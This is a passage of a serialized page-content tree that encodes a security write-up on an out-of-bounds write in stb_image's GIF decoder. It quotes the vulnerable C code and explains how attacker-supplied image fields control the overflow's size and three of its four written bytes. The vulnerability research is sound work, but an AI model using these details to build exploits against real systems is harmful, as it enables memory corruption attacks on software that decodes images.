"tag":216,"props":152244,"children":152245},{"class":6922,"line":7216},[152246,152250,152254,152258,152262,152266,152270],{"type":25,"tag":216,"props":152247,"children":152248},{"style":6964},[152249],{"type":31,"value":151960},{"type":25,"tag":216,"props":152251,"children":152252},{"style":6953},[152253],{"type":31,"value":266},{"type":25,"tag":216,"props":152255,"children":152256},{"style":6953},[152257],{"type":31,"value":11093},{"type":25,"tag":216,"props":152259,"children":152260},{"style":6947},[152261],{"type":31,"value":113250},{"type":25,"tag":216,"props":152263,"children":152264},{"style":6964},[152265],{"type":31,"value":17714},{"type":25,"tag":216,"props":152267,"children":152268},{"style":6947},[152269],{"type":31,"value":122657},{"type":25,"tag":216,"props":152271,"children":152272},{"style":6964},[152273],{"type":31,"value":151985},{"type":25,"tag":216,"props":152275,"children":152276},{"class":6922,"line":7244},[152277,152281,152285,152289,152293,152297,152301,152305,152309,152313],{"type":25,"tag":216,"props":152278,"children":152279},{"style":6947},[152280],{"type":31,"value":151993},{"type":25,"tag":216,"props":152282,"children":152283},{"style":6964},[152284],{"type":31,"value":17714},{"type":25,"tag":216,"props":152286,"children":152287},{"style":6947},[152288],{"type":31,"value":152002},{"type":25,"tag":216,"props":152290,"children":152291},{"style":6964},[152292],{"type":31,"value":152007},{"type":25,"tag":216,"props":152294,"children":152295},{"style":6953},[152296],{"type":31,"value":5755},{"type":25,"tag":216,"props":152298,"children":152299},{"style":6989},[152300],{"type":31,"value":15701},{"type":25,"tag":216,"props":152302,"children":152303},{"style":6964},[152304],{"type":31,"value":12614},{"type":25,"tag":216,"props":152306,"children":152307},{"style":6953},[152308],{"type":31,"value":266},{"type":25,"tag":216,"props":152310,"children":152311},{"style":6989},[152312],{"type":31,"value":8471},{"type":25,"tag":216,"props":152314,"children":152315},{"style":6964},[152316],{"type":31,"value":152317},";  \n",{"type":25,"tag":216,"props":152319,"children":152320},{"class":6922,"line":7257},[152321],{"type":25,"tag":216,"props":152322,"children":152323},{"emptyLinePlaceholder":16},[152324],{"type":31,"value":7642},{"type":25,"tag":216,"props":152326,"children":152327},{"class":6922,"line":7275},[152328,152333,152337,152341,152345,152349,152354,152358,152362,152366,152371,152376,152381,152385,152389],{"type":25,"tag":216,"props":152329,"children":152330},{"style":6964},[152331],{"type":31,"value":152332},"   c ",{"type":25,"tag":216,"props":152334,"children":152335},{"style":6953},[152336],{"type":31,"value":266},{"type":25,"tag":216,"props":152338,"children":152339},{"style":6953},[152340],{"type":31,"value":11093},{"type":25,"tag":216,"props":152342,"children":152343},{"style":6947},[152344],{"type":31,"value":113250},{"type":25,"tag":216,"props":152346,"children":152347},{"style":6964},[152348],{"type":31,"value":17714},{"type":25,"tag":216,"props":152350,"children":152351},{"style":6947},[152352],{"type":31,"value":152353},"color_table",{"type":25,"tag":216,"props":152355,"children":152356},{"style":6964},[152357],{"type":31,"value":7701},{"type":25,"tag":216,"props":152359,"children":152360},{"style":6947},[152361],{"type":31,"value":113250},{"type":25,"tag":216,"props":152363,"children":152364},{"style":6964},[152365],{"type":31,"value":17714},{"type":25,"tag":216,"props":152367,"children":152368},{"style":6947},[152369],{"type":31,"value":152370},"codes",{"type":25,"tag":216,"props":152372,"children":152373},{"style":6964},[152374],{"type":31,"value":152375},"[code].",{"type":25,"tag":216,"props":152377,"children":152378},{"style":6947},[152379],{"type":31,"value":152380},"suffix",{"type":25,"tag":216,"props":152382,"children":152383},{"style":6953},[152384],{"type":31,"value":13773},{"type":25,"tag":216,"props":152386,"children":152387},{"style":6989},[152388],{"type":31,"value":15701},{"type":25,"tag":216,"props":152390,"children":152391},{"style":6964},[152392],{"type":31,"value":35536},{"type":25,"tag":216,"props":152394,"children":152395},{"class":6922,"line":7296},[152396,152400,152404,152408,152412,152416,152420,152424,152429],{"type":25,"tag":216,"props":152397,"children":152398},{"style":6973},[152399],{"type":31,"value":56612},{"type":25,"tag":216,"props":152401,"children":152402},{"style":6964},[152403],{"type":31,"value":7016},{"type":25,"tag":216,"props":152405,"children":152406},{"style":6947},[152407],{"type":31,"value":2254},{"type":25,"tag":216,"props":152409,"children":152410},{"style":6964},[152411],{"type":31,"value":7701},{"type":25,"tag":216,"props":152413,"children":152414},{"style":6989},[152415],{"type":31,"value":21253},{"type":25,"tag":216,"props":152417,"children":152418},{"style":6964},[152419],{"type":31,"value":12614},{"type":25,"tag":216,"props":152421,"children":152422},{"style":6953},[152423],{"type":31,"value":5902},{"type":25,"tag":216,"props":152425,"children":152426},{"style":6989},[152427],{"type":31,"value":152428}," 128",{"type":25,"tag":216,"props":152430,"children":152431},{"style":6964},[152432],{"type":31,"value":18761},{"type":25,"tag":216,"props":152434,"children":152435},{"class":6922,"line":7305},[152436,152441,152445,152449,152453,152457,152461,152465,152469,152473],{"type":25,"tag":216,"props":152437,"children":152438},{"style":6947},[152439],{"type":31,"value":152440},"      p",{"type":25,"tag":216,"props":152442,"children":152443},{"style":6964},[152444],{"type":31,"value":7701},{"type":25,"tag":216,"props":152446,"children":152447},{"style":6989},[152448],{"type":31,"value":1882},{"type":25,"tag":216,"props":152450,"children":152451},{"style":6964},[152452],{"type":31,"value":12614},{"type":25,"tag":216,"props":152454,"children":152455},{"style":6953},[152456],{"type":31,"value":266},{"type":25,"tag":216,"props":152458,"children":152459},{"style":6947},[152460],{"type":31,"value":41408},{"type":25,"tag":216,"props":152462,"children":152463},{"style":6964},[152464],{"type":31,"value":7701},{"type":25,"tag":216,"props":152466,"children":152467},{"style":6989},[152468],{"type":31,"value":331},{"type":25,"tag":216,"props":152470,"children":152471},{"style":6964},[152472],{"type":31,"value":59880},{"type":25,"tag":216,"props":152474,"children":152475},{"style":6927},[152476],{"type":31,"value":152477},"        // OOB write\n",{"type":25,"tag":216,"props":152479,"children":152480},{"class":6922,"line":7557},[152481,152485,152489,152493,152497,152501,152505,152509,152513],{"type":25,"tag":216,"props":152482,"children":152483},{"style":6947},[152484],{"type":31,"value":152440},{"type":25,"tag":216,"props":152486,"children":152487},{"style":6964},[152488],{"type":31,"value":7701},{"type":25,"tag":216,"props":152490,"children":152491},{"style":6989},[152492],{"type":31,"value":184},{"type":25,"tag":216,"props":152494,"children":152495},{"style":6964},[152496],{"type":31,"value":12614},{"type":25,"tag":216,"props":152498,"children":152499},{"style":6953},[152500],{"type":31,"value":266},{"type":25,"tag":216,"props":152502,"children":152503},{"style":6947},[152504],{"type":31,"value":41408},{"type":25,"tag":216,"props":152506,"children":152507},{"style":6964},[152508],{"type":31,"value":7701},{"type":25,"tag":216,"props":152510,"children":152511},{"style":6989},[152512],{"type":31,"value":184},{"type":25,"tag":216,"props":152514,"children":152515},{"style":6964},[152516],{"type":31,"value":35536},{"type":25,"tag":216,"props":152518,"children":152519},{"class":6922,"line":7574},[152520,152524,152528,152532,152536,152540,152544,152548,152552],{"type":25,"tag":216,"props":152521,"children":152522},{"style":6947},[152523],{"type":31,"value":152440},{"type":25,"tag":216,"props":152525,"children":152526},{"style":6964},[152527],{"type":31,"value":7701},{"type":25,"tag":216,"props":152529,"children":152530},{"style":6989},[152531],{"type":31,"value":331},{"type":25,"tag":216,"props":152533,"children":152534},{"style":6964},[152535],{"type":31,"value":12614},{"type":25,"tag":216,"props":152537,"children":152538},{"style":6953},[152539],{"type":31,"value":266},{"type":25,"tag":216,"props":152541,"children":152542},{"style":6947},[152543],{"type":31,"value":41408},{"type":25,"tag":216,"props":152545,"children":152546},{"style":6964},[152547],{"type":31,"value":7701},{"type":25,"tag":216,"props":152549,"children":152550},{"style":6989},[152551],{"type":31,"value":1882},{"type":25,"tag":216,"props":152553,"children":152554},{"style":6964},[152555],{"type":31,"value":35536},{"type":25,"tag":216,"props":152557,"children":152558},{"class":6922,"line":7591},[152559,152563,152567,152571,152575,152579,152583,152587,152591],{"type":25,"tag":216,"props":152560,"children":152561},{"style":6947},[152562],{"type":31,"value":152440},{"type":25,"tag":216,"props":152564,"children":152565},{"style":6964},[152566],{"type":31,"value":7701},{"type":25,"tag":216,"props":152568,"children":152569},{"style":6989},[152570],{"type":31,"value":21253},{"type":25,"tag":216,"props":152572,"children":152573},{"style":6964},[152574],{"type":31,"value":12614},{"type":25,"tag":216,"props":152576,"children":152577},{"style":6953},[152578],{"type":31,"value":266},{"type":25,"tag":216,"props":152580,"children":152581},{"style":6947},[152582],{"type":31,"value":41408},{"type":25,"tag":216,"props":152584,"children":152585},{"style":6964},[152586],{"type":31,"value":7701},{"type":25,"tag":216,"props":152588,"children":152589},{"style":6989},[152590],{"type":31,"value":21253},{"type":25,"tag":216,"props":152592,"children":152593},{"style":6964},[152594],{"type":31,"value":35536},{"type":25,"tag":216,"props":152596,"children":152597},{"class":6922,"line":7604},[152598],{"type":25,"tag":216,"props":152599,"children":152600},{"style":6964},[152601],{"type":31,"value":38711},{"type":25,"tag":38,"props":152603,"children":152604},{},[152605,152607,152612,152614,152619],{"type":31,"value":152606},"This confirms ",{"type":25,"tag":82,"props":152608,"children":152610},{"className":152609},[],[152611],{"type":31,"value":80489},{"type":31,"value":152613}," is OOB for ",{"type":25,"tag":82,"props":152615,"children":152617},{"className":152616},[],[152618],{"type":31,"value":152097},{"type":31,"value":152620}," as well - here it results in a four-byte OOB write. A four-byte OOB write is still not trivial to exploit remotely, but it is meaningfully more dangerous than a single-byte OOB.",{"type":25,"tag":38,"props":152622,"children":152623},{},[152624,152626,152632,152634,152641],{"type":31,"value":152625},"We've read through the GIF parsing code to find out if the written values can be controlled, and found that ",{"type":25,"tag":82,"props":152627,"children":152629},{"className":152628},[],[152630],{"type":31,"value":152631},"g->color_table",{"type":31,"value":152633}," is populated by ",{"type":25,"tag":162,"props":152635,"children":152638},{"href":152636,"rel":152637},"https://github.com/nothings/stb/blob/f1f077b2722f55e158cba020f0312ee2d13c463a/stb_image.h#L6166-L6175",[166],[152639],{"type":31,"value":152640},"stbi__gif_parse_colortable",{"type":31,"value":1472},{"type":25,"tag":206,"props":152643,"children":152645},{"code":152644,"language":2254,"meta":7,"className":20473,"style":7},"static void stbi__gif_parse_colortable(\n    stbi__context *s,\n    stbi_uc pal[256][4],    // g->color_table\n    int num_entries,\n    int transp\n) {\n   int i;\n   for (i=0; i \u003C num_entries; ++i) {\n      pal[i][2] = stbi__get8(s);\n      pal[i][1] = stbi__get8(s);\n      pal[i][0] = stbi__get8(s);\n      pal[i][3] = transp == i ? 0 : 255;\n   }\n}\n",[152646],{"type":25,"tag":82,"props":152647,"children":152648},{"__ignoreMap":7},[152649,152669,152689,152728,152744,152756,152763,152774,152817,152851,152882,152913,152970,152977],{"type":25,"tag":216,"props":152650,"children":152651},{"class":6922,"line":6923},[152652,152656,152660,152665],{"type":25,"tag":216,"props":152653,"children":152654},{"style":6936},[152655],{"type":31,"value":55013},{"type":25,"tag":216,"props":152657,"children":152658},{"style":6936},[152659],{"type":31,"value":55018},{"type":25,"tag":216,"props":152661,"children":152662},{"style":7047},[152663],{"type":31,"value":152664}," stbi__gif_parse_colortable",{"type":25,"tag":216,"props":152666,"children":152667},{"style":6964},[152668],{"type":31,"value":7420},{"type":25,"tag":216,"props":152670,"children":152671},{"class":6922,"line":6769},[152672,152677,152681,152685],{"type":25,"tag":216,"props":152673,"children":152674},{"style":6964},[152675],{"type":31,"value":152676},"    stbi__context ",{"type":25,"tag":216,"props":152678,"children":152679},{"style":6953},[152680],{"type":31,"value":8519},{"type":25,"tag":216,"props":152682,"children":152683},{"style":6947},[152684],{"type":31,"value":3245},{"type":25,"tag":216,"props":152686,"children":152687},{"style":6964},[152688],{"type":31,"value":7465},{"type":25,"tag":216,"props":152690,"children":152691},{"class":6922,"line":6778},[152692,152697,152702,152706,152710,152714,152718,152723],{"type":25,"tag":216,"props":152693,"children":152694},{"style":6964},[152695],{"type":31,"value":152696},"    stbi_uc ",{"type":25,"tag":216,"props":152698,"children":152699},{"style":6947},[152700],{"type":31,"value":152701},"pal",{"type":25,"tag":216,"props":152703,"children":152704},{"style":6964},[152705],{"type":31,"value":7701},{"type":25,"tag":216,"props":152707,"children":152708},{"style":6989},[152709],{"type":31,"value":97261},{"type":25,"tag":216,"props":152711,"children":152712},{"style":6964},[152713],{"type":31,"value":52927},{"type":25,"tag":216,"props":152715,"children":152716},{"style":6989},[152717],{"type":31,"value":21486},{"type":25,"tag":216,"props":152719,"children":152720},{"style":6964},[152721],{"type":31,"value":152722},"],",{"type":25,"tag":216,"props":152724,"children":152725},{"style":6927},[152726],{"type":31,"value":152727},"    // g->color_table\n",{"type":25,"tag":216,"props":152729,"children":152730},{"class":6922,"line":7005},[152731,152735,152740],{"type":25,"tag":216,"props":152732,"children":152733},{"style":6936},[152734],{"type":31,"value":23037},{"type":25,"tag":216,"props":152736,"children":152737},{"style":6947},[152738],{"type":31,"value":152739}," num_entries",{"type":25,"tag":216,"props":152741,"children":152742},{"style":6964},[152743],{"type":31,"value":7465},{"type":25,"tag":216,"props":152745,"children":152746},{"class":6922,"line":7110},[152747,152751],{"type":25,"tag":216,"props":152748,"children":152749},{"style":6936},[152750],{"type":31,"value":23037},{"type":25,"tag":216,"props":152752,"children":152753},{"style":6964},[152754],{"type":31,"value":152755}," transp\n",{"type":25,"tag":216,"props":152757,"children":152758},{"class":6922,"line":7216},[152759],{"type":25,"tag":216,"props":152760,"children":152761},{"style":6964},[152762],{"type":31,"value":18761},{"type":25,"tag":216,"props":152764,"children":152765},{"class":6922,"line":7244},[152766,152770],{"type":25,"tag":216,"props":152767,"children":152768},{"style":6936},[152769],{"type":31,"value":151818},{"type":25,"tag":216,"props":152771,"children":152772},{"style":6964},[152773],{"type":31,"value":61932},{"type":25,"tag":216,"props":152775,"children":152776},{"class":6922,"line":7257},[152777,152782,152787,152791,152795,152799,152803,152808,152812],{"type":25,"tag":216,"props":152778,"children":152779},{"style":6973},[152780],{"type":31,"value":152781},"   for",{"type":25,"tag":216,"props":152783,"children":152784},{"style":6964},[152785],{"type":31,"value":152786}," (i",{"type":25,"tag":216,"props":152788,"children":152789},{"style":6953},[152790],{"type":31,"value":266},{"type":25,"tag":216,"props":152792,"children":152793},{"style":6989},[152794],{"type":31,"value":1882},{"type":25,"tag":216,"props":152796,"children":152797},{"style":6964},[152798],{"type":31,"value":55202},{"type":25,"tag":216,"props":152800,"children":152801},{"style":6953},[152802],{"type":31,"value":9757},{"type":25,"tag":216,"props":152804,"children":152805},{"style":6964},[152806],{"type":31,"value":152807}," num_entries; ",{"type":25,"tag":216,"props":152809,"children":152810},{"style":6953},[152811],{"type":31,"value":55238},{"type":25,"tag":216,"props":152813,"children":152814},{"style":6964},[152815],{"type":31,"value":152816},"i) {\n",{"type":25,"tag":216,"props":152818,"children":152819},{"class":6922,"line":7275},[152820,152825,152829,152833,152837,152841,152846],{"type":25,"tag":216,"props":152821,"children":152822},{"style":6947},[152823],{"type":31,"value":152824},"      pal",{"type":25,"tag":216,"props":152826,"children":152827},{"style":6964},[152828],{"type":31,"value":64622},{"type":25,"tag":216,"props":152830,"children":152831},{"style":6989},[152832],{"type":31,"value":331},{"type":25,"tag":216,"props":152834,"children":152835},{"style":6964},[152836],{"type":31,"value":12614},{"type":25,"tag":216,"props":152838,"children":152839},{"style":6953},[152840],{"type":31,"value":266},{"type":25,"tag":216,"props":152842,"children":152843},{"style":7047},[152844],{"type":31,"value":152845}," stbi__get8",{"type":25,"tag":216,"props":152847,"children":152848},{"style":6964},[152849],{"type":31,"value":152850},"(s);\n",{"type":25,"tag":216,"props":152852,"children":152853},{"class":6922,"line":7296},[152854,152858,152862,152866,152870,152874,152878],{"type":25,"tag":216,"props":152855,"children":152856},{"style":6947},[152857],{"type":31,"value":152824},{"type":25,"tag":216,"props":152859,"children":152860},{"style":6964},[152861],{"type":31,"value":64622},{"type":25,"tag":216,"props":152863,"children":152864},{"style":6989},[152865],{"type":31,"value":184},{"type":25,"tag":216,"props":152867,"children":152868},{"style":6964},[152869],{"type":31,"value":12614},{"type":25,"tag":216,"props":152871,"children":152872},{"style":6953},[152873],{"type":31,"value":266},{"type":25,"tag":216,"props":152875,"children":152876},{"style":7047},[152877],{"type":31,"value":152845},{"type":25,"tag":216,"props":152879,"children":152880},{"style":6964},[152881],{"type":31,"value":152850},{"type":25,"tag":216,"props":152883,"children":152884},{"class":6922,"line":7305},[152885,152889,152893,152897,152901,152905,152909],{"type":25,"tag":216,"props":152886,"children":152887},{"style":6947},[152888],{"type":31,"value":152824},{"type":25,"tag":216,"props":152890,"children":152891},{"style":6964},[152892],{"type":31,"value":64622},{"type":25,"tag":216,"props":152894,"children":152895},{"style":6989},[152896],{"type":31,"value":1882},{"type":25,"tag":216,"props":152898,"children":152899},{"style":6964},[152900],{"type":31,"value":12614},{"type":25,"tag":216,"props":152902,"children":152903},{"style":6953},[152904],{"type":31,"value":266},{"type":25,"tag":216,"props":152906,"children":152907},{"style":7047},[152908],{"type":31,"value":152845},{"type":25,"tag":216,"props":152910,"children":152911},{"style":6964},[152912],{"type":31,"value":152850},{"type":25,"tag":216,"props":152914,"children":152915},{"class":6922,"line":7557},[152916,152920,152924,152928,152932,152936,152941,152945,152949,152953,152957,152961,152966],{"type":25,"tag":216,"props":152917,"children":152918},{"style":6947},[152919],{"type":31,"value":152824},{"type":25,"tag":216,"props":152921,"children":152922},{"style":6964},[152923],{"type":31,"value":64622},{"type":25,"tag":216,"props":152925,"children":152926},{"style":6989},[152927],{"type":31,"value":21253},{"type":25,"tag":216,"props":152929,"children":152930},{"style":6964},[152931],{"type":31,"value":12614},{"type":25,"tag":216,"props":152933,"children":152934},{"style":6953},[152935],{"type":31,"value":266},{"type":25,"tag":216,"props":152937,"children":152938},{"style":6964},[152939],{"type":31,"value":152940}," transp ",{"type":25,"tag":216,"props":152942,"children":152943},{"style":6953},[152944],{"type":31,"value":12528},{"type":25,"tag":216,"props":152946,"children":152947},{"style":6964},[152948],{"type":31,"value":58512},{"type":25,"tag":216,"props":152950,"children":152951},{"style":6953},[152952],{"type":31,"value":604},{"type":25,"tag":216,"props":152954,"children":152955},{"style":6989},[152956],{"type":31,"value":6992},{"type":25,"tag":216,"props":152958,"children":152959},{"style":6953},[152960],{"type":31,"value":39079},{"type":25,"tag":216,"props":152962,"children":152963},{"style":6989},[152964],{"type":31,"value":152965}," 255",{"type":25,"tag":216,"props":152967,"children":152968},{"style":6964},[152969],{"type":31,"value":6967},{"type":25,"tag":216,"props":152971,"children":152972},{"class":6922,"line":7574},[152973],{"type":25,"tag":216,"props":152974,"children":152975},{"style":6964},[152976],{"type":31,"value":38711},{"type":25,"tag":216,"props":152978,"children":152979},{"class":6922,"line":7591},[152980],{"type":25,"tag":216,"props":152981,"children":152982},{"style":6964},[152983],{"type":31,"value":7874},{"type":25,"tag":38,"props":152985,"children":152986},{},[152987,152989,152994,152995,153000,153002,153007],{"type":31,"value":152988},"The first three bytes are read from the input image, while the last byte can be either ",{"type":25,"tag":82,"props":152990,"children":152992},{"className":152991},[],[152993],{"type":31,"value":1882},{"type":31,"value":17090},{"type":25,"tag":82,"props":152996,"children":152998},{"className":152997},[],[152999],{"type":31,"value":117286},{"type":31,"value":153001},". But as we've seen previously, the OOB write only happens if the last byte is more than ",{"type":25,"tag":82,"props":153003,"children":153005},{"className":153004},[],[153006],{"type":31,"value":33808},{"type":31,"value":1472},{"type":25,"tag":206,"props":153009,"children":153011},{"code":153010,"language":2254,"meta":7,"className":20473,"style":7},"   c = &g->color_table[g->codes[code].suffix * 4];\n   if (c[3] > 128) {\n      p[0] = c[2];\n      p[1] = c[1];\n      p[2] = c[0];\n      p[3] = c[3];\n   }\n",[153012],{"type":25,"tag":82,"props":153013,"children":153014},{"__ignoreMap":7},[153015,153078,153117,153156,153195,153234,153273],{"type":25,"tag":216,"props":153016,"children":153017},{"class":6922,"line":6923},[153018,153022,153026,153030,153034,153038,153042,153046,153050,153054,153058,153062,153066,153070,153074],{"type":25,"tag":216,"props":153019,"children":153020},{"style":6964},[153021],{"type":31,"value":152332},{"type":25,"tag":216,"props":153023,"children":153024},{"style":6953},[153025],{"type":31,"value":266},{"type":25,"tag":216,"props":153027,"children":153028},{"style":6953},[153029],{"type":31,"value":11093},{"type":25,"tag":216,"props":153031,"children":153032},{"style":6964},[153033],{"type":31,"value":113250},{"type":25,"tag":216,"props":153035,"children":153036},{"style":6953},[153037],{"type":31,"value":17714},{"type":25,"tag":216,"props":153039,"children":153040},{"style":6947},[153041],{"type":31,"value":152353},{"type":25,"tag":216,"props":153043,"children":153044},{"style":6964},[153045],{"type":31,"value":7701},{"type":25,"tag":216,"props":153047,"children":153048},{"style":6947},[153049],{"type":31,"value":113250},{"type":25,"tag":216,"props":153051,"children":153052},{"style":6964},[153053],{"type":31,"value":17714},{"type":25,"tag":216,"props":153055,"children":153056},{"style":6947},[153057],{"type":31,"value":152370},{"type":25,"tag":216,"props":153059,"children":153060},{"style":6964},[153061],{"type":31,"value":152375},{"type":25,"tag":216,"props":153063,"children":153064},{"style":6947},[153065],{"type":31,"value":152380},{"type":25,"tag":216,"props":153067,"children":153068},{"style":6953},[153069],{"type":31,"value":13773},{"type":25,"tag":216,"props":153071,"children":153072},{"style":6989},[153073],{"type":31,"value":15701},{"type":25,"tag":216,"props":153075,"children":153076},{"style":6964},[153077],{"type":31,"value":35536},{"type":25,"tag":216,"props":153079,"children":153080},{"class":6922,"line":6769},[153081,153085,153089,153093,153097,153101,153105,153109,153113],{"type":25,"tag":216,"props":153082,"children":153083},{"style":6973},[153084],{"type":31,"value":56612},{"type":25,"tag":216,"props":153086,"children":153087},{"style":6964},[153088],{"type":31,"value":7016},{"type":25,"tag":216,"props":153090,"children":153091},{"style":6947},[153092],{"type":31,"value":2254},{"type":25,"tag":216,"props":153094,"children":153095},{"style":6964},[153096],{"type":31,"value":7701},{"type":25,"tag":216,"props":153098,"children":153099},{"style":6989},[153100],{"type":31,"value":21253},{"type":25,"tag":216,"props":153102,"children":153103},{"style":6964},[153104],{"type":31,"value":12614},{"type":25,"tag":216,"props":153106,"children":153107},{"style":6953},[153108],{"type":31,"value":5902},{"type":25,"tag":216,"props":153110,"children":153111},{"style":6989},[153112],{"type":31,"value":152428},{"type":25,"tag":216,"props":153114,"children":153115},{"style":6964},[153116],{"type":31,"value":18761},{"type":25,"tag":216,"props":153118,"children":153119},{"class":6922,"line":6778},[153120,153124,153128,153132,153136,153140,153144,153148,153152],{"type":25,"tag":216,"props":153121,"children":153122},{"style":6947},[153123],{"type":31,"value":152440},{"type":25,"tag":216,"props":153125,"children":153126},{"style":6964},[153127],{"type":31,"value":7701},{"type":25,"tag":216,"props":153129,"children":153130},{"style":6989},[153131],{"type":31,"value":1882},{"type":25,"tag":216,"props":153133,"children":153134},{"style":6964},[153135],{"type":31,"value":12614},{"type":25,"tag":216,"props":153137,"children":153138},{"style":6953},[153139],{"type":31,"value":266},{"type":25,"tag":216,"props":153141,"children":153142},{"style":6947},[153143],{"type":31,"value":41408},{"type":25,"tag":216,"props":153145,"children":153146},{"style":6964},[153147],{"type":31,"value":7701},{"type":25,"tag":216,"props":153149,"children":153150},{"style":6989},[153151],{"type":31,"value":331},{"type":25,"tag":216,"props":153153,"children":153154},{"style":6964},[153155],{"type":31,"value":35536},{"type":25,"tag":216,"props":153157,"children":153158},{"class":6922,"line":7005},[153159,153163,153167,153171,153175,153179,153183,153187,153191],{"type":25,"tag":216,"props":153160,"children":153161},{"style":6947},[153162],{"type":31,"value":152440},{"type":25,"tag":216,"props":153164,"children":153165},{"style":6964},[153166],{"type":31,"value":7701},{"type":25,"tag":216,"props":153168,"children":153169},{"style":6989},[153170],{"type":31,"value":184},{"type":25,"tag":216,"props":153172,"children":153173},{"style":6964},[153174],{"type":31,"value":12614},{"type":25,"tag":216,"props":153176,"children":153177},{"style":6953},[153178],{"type":31,"value":266},{"type":25,"tag":216,"props":153180,"children":153181},{"style":6947},[153182],{"type":31,"value":41408},{"type":25,"tag":216,"props":153184,"children":153185},{"style":6964},[153186],{"type":31,"value":7701},{"type":25,"tag":216,"props":153188,"children":153189},{"style":6989},[153190],{"type":31,"value":184},{"type":25,"tag":216,"props":153192,"children":153193},{"style":6964},[153194],{"type":31,"value":35536},{"type":25,"tag":216,"props":153196,"children":153197},{"class":6922,"line":7110},[153198,153202,153206,153210,153214,153218,153222,153226,153230],{"type":25,"tag":216,"props":153199,"children":153200},{"style":6947},[153201],{"type":31,"value":152440},{"type":25,"tag":216,"props":153203,"children":153204},{"style":6964},[153205],{"type":31,"value":7701},{"type":25,"tag":216,"props":153207,"children":153208},{"style":6989},[153209],{"type":31,"value":331},{"type":25,"tag":216,"props":153211,"children":153212},{"style":6964},[153213],{"type":31,"value":12614},{"type":25,"tag":216,"props":153215,"children":153216},{"style":6953},[153217],{"type":31,"value":266},{"type":25,"tag":216,"props":153219,"children":153220},{"style":6947},[153221],{"type":31,"value":41408},{"type":25,"tag":216,"props":153223,"children":153224},{"style":6964},[153225],{"type":31,"value":7701},{"type":25,"tag":216,"props":153227,"children":153228},{"style":6989},[153229],{"type":31,"value":1882},{"type":25,"tag":216,"props":153231,"children":153232},{"style":6964},[153233],{"type":31,"value":35536},{"type":25,"tag":216,"props":153235,"children":153236},{"class":6922,"line":7216},[153237,153241,153245,153249,153253,153257,153261,153265,153269],{"type":25,"tag":216,"props":153238,"children":153239},{"style":6947},[153240],{"type":31,"value":152440},{"type":25,"tag":216,"props":153242,"children":153243},{"style":6964},[153244],{"type":31,"value":7701},{"type":25,"tag":216,"props":153246,"children":153247},{"style":6989},[153248],{"type":31,"value":21253},{"type":25,"tag":216,"props":153250,"children":153251},{"style":6964},[153252],{"type":31,"value":12614},{"type":25,"tag":216,"props":153254,"children":153255},{"style":6953},[153256],{"type":31,"value":266},{"type":25,"tag":216,"props":153258,"children":153259},{"style":6947},[153260],{"type":31,"value":41408},{"type":25,"tag":216,"props":153262,"children":153263},{"style":6964},[153264],{"type":31,"value":7701},{"type":25,"tag":216,"props":153266,"children":153267},{"style":6989},[153268],{"type":31,"value":21253},{"type":25,"tag":216,"props":153270,"children":153271},{"style":6964},[153272],{"type":31,"value":35536},{"type":25,"tag":216,"props":153274,"children":153275},{"class":6922,"line":7244},[153276],{"type":25,"tag":216,"props":153277,"children":153278},{"style":6964},[153279],{"type":31,"value":38711},{"type":25,"tag":38,"props":153281,"children":153282},{},[153283,153284,153289,153291,153296,153298,153303],{"type":31,"value":27972},{"type":25,"tag":82,"props":153285,"children":153287},{"className":153286},[],[153288],{"type":31,"value":152640},{"type":31,"value":153290}," has to set the last byte to ",{"type":25,"tag":82,"props":153292,"children":153294},{"className":153293},[],[153295],{"type":31,"value":117286},{"type":31,"value":153297}," in order for the four-byte OOB write to happen, meaning we can control the first three bytes of the overflow while the last byte will always be ",{"type":25,"tag":82,"props":153299,"children":153301},{"className":153300},[],[153302],{"type":31,"value":117286},{"type":31,"value":179},{"type":25,"tag":38,"props":153305,"children":153306},{},[153307,153309,153314,153316,153322,153323,153329],{"type":31,"value":153308},"In the code we can see that size of the ",{"type":25,"tag":82,"props":153310,"children":153312},{"className":153311},[],[153313],{"type":31,"value":152097},{"type":31,"value":153315}," allocation is controlled through ",{"type":25,"tag":82,"props":153317,"children":153319},{"className":153318},[],[153320],{"type":31,"value":153321},"g->w",{"type":31,"value":1307},{"type":25,"tag":82,"props":153324,"children":153326},{"className":153325},[],[153327],{"type":31,"value":153328},"g->h",{"type":31,"value":153330}," values, both of which are read from the input file itself:",{"type":25,"tag":206,"props":153332,"children":153334},{"code":153333,"language":2254,"meta":7,"className":20473,"style":7},"static stbi_uc *stbi__gif_load_next(...)\n{\n   [...]\n   if (g->out == 0) {\n      if (!stbi__gif_header(s, g, comp,0))     return 0;\n      g->out = (stbi_uc *) stbi__malloc(4 * g->w * g->h);\n",[153335],{"type":25,"tag":82,"props":153336,"children":153337},{"__ignoreMap":7},[153338,153363,153370,153377,153412,153458],{"type":25,"tag":216,"props":153339,"children":153340},{"class":6922,"line":6923},[153341,153345,153350,153354,153358],{"type":25,"tag":216,"props":153342,"children":153343},{"style":6936},[153344],{"type":31,"value":55013},{"type":25,"tag":216,"props":153346,"children":153347},{"style":6964},[153348],{"type":31,"value":153349}," stbi_uc ",{"type":25,"tag":216,"props":153351,"children":153352},{"style":6953},[153353],{"type":31,"value":8519},{"type":25,"tag":216,"props":153355,"children":153356},{"style":7047},[153357],{"type":31,"value":151276},{"type":25,"tag":216,"props":153359,"children":153360},{"style":6964},[153361],{"type":31,"value":153362},"(...)\n",{"type":25,"tag":216,"props":153364,"children":153365},{"class":6922,"line":6769},[153366],{"type":25,"tag":216,"props":153367,"children":153368},{"style":6964},[153369],{"type":31,"value":14836},{"type":25,"tag":216,"props":153371,"children":153372},{"class":6922,"line":6778},[153373],{"type":25,"tag":216,"props":153374,"children":153375},{"style":6964},[153376],{"type":31,"value":151838},{"type":25,"tag":216,"props":153378,"children":153379},{"class":6922,"line":7005},[153380,153384,153388,153392,153396,153400,153404,153408],{"type":25,"tag":216,"props":153381,"children":153382},{"style":6973},[153383],{"type":31,"value":56612},{"type":25,"tag":216,"props":153385,"children":153386},{"style":6964},[153387],{"type":31,"value":7016},{"type":25,"tag":216,"props":153389,"children":153390},{"style":6947},[153391],{"type":31,"value":113250},{"type":25,"tag":216,"props":153393,"children":153394},{"style":6964},[153395],{"type":31,"value":17714},{"type":25,"tag":216,"props":153397,"children":153398},{"style":6947},[153399],{"type":31,"value":122657},{"type":25,"tag":216,"props":153401,"children":153402},{"style":6953},[153403],{"type":31,"value":7232},{"type":25,"tag":216,"props":153405,"children":153406},{"style":6989},[153407],{"type":31,"value":6992},{"type":25,"tag":216,"props":153409,"children":153410},{"style":6964},[153411],{"type":31,"value":18761},{"type":25,"tag":216,"props":153413,"children":153414},{"class":6922,"line":7110},[153415,153419,153423,153427,153432,153437,153441